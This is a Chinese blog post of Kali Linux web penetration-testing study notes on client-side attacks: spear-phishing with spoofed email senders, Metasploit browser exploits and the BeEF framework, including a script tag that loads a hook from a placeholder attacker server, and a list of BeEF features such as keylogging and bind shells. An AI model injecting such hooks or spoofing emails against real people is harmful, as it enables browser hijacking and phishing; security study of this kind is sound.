Kali进行web渗透笔记(九)
2016-06-12 01:02
483 查看
Exploiting the Client Using Attack Frameworks
spear-phing e-mail attack:Choosing your own mail server has one distinct advantage:it allows you to spoof an e-mail address and,if the victim’s mail server does not performs reverse DNS lookups,the e-mail is sure to hit the victim’s mailbox.Metasploit browser exploit
Browser exploitation framework(BeEf):exploiting XSS flaws,the tool can also make web browsers attack other websites using injected JavaScript.
The BeEF attack platform can generate and deliver payloads directly to the target web browser.an attractive tool for social engineering attacks are the different types of modules,and its ability to control many web browsers at the same time using something known as a hook.
BeEF consists of two major components:
A server application that manages the hooked clients,also known as zombies .
A JavaScript hook that runs in the web browser of the victim
An example of a hook is shown in the following code .This code iss injected in a HTML file that is downloaded by the web browser:
<script type="text/javascript" src="http://<BeEF_server_IP>:3000/hook.js></script>"
The default username and password to log into the web interface is beef.
Some of the features and usses og the BeEF tool are listed as follows:
Port scanner
Key Logger
Browsser information gathering
Bind shell
Network Mapping
Metasploit integration
相关文章推荐
- java-WEB中的监听器Lisener
- GUI - Web前端开发框架
- Extjs4.0 最新最全视频教程
- MyEclipse Web Project转Eclipse Dynamic Web Project
- axis备忘
- 创业如何选择WEB开发语言
- Erlang实现的一个Web服务器代码实例
- 防止网页脚本病毒执行的方法-from web
- 自学成才的秘密:115个 web Develop 资源
- 使用批处理修改web打印设置笔记 适用于IE
- Apache Web让JSP“动”起来
- web下载的ActiveX控件自动更新
- 推荐六款WEB上传组件性能测试与比较第1/10页
- 关于三种主流WEB架构的思考
- 使用 Iisext.vbs 列出 Web 服务扩展文件的方法
- 使用 Iisext.vbs 删除 Web 服务扩展文件的方法
- 使用 iisext.vbs 禁用 Web 服务扩展的方法
- 用vbs 实现从剪贴板中抓取一个 URL 然后在浏览器中打开该 Web 站点
- web标准知识——从p开始,循序渐进
- web标准知识――用途相似的标签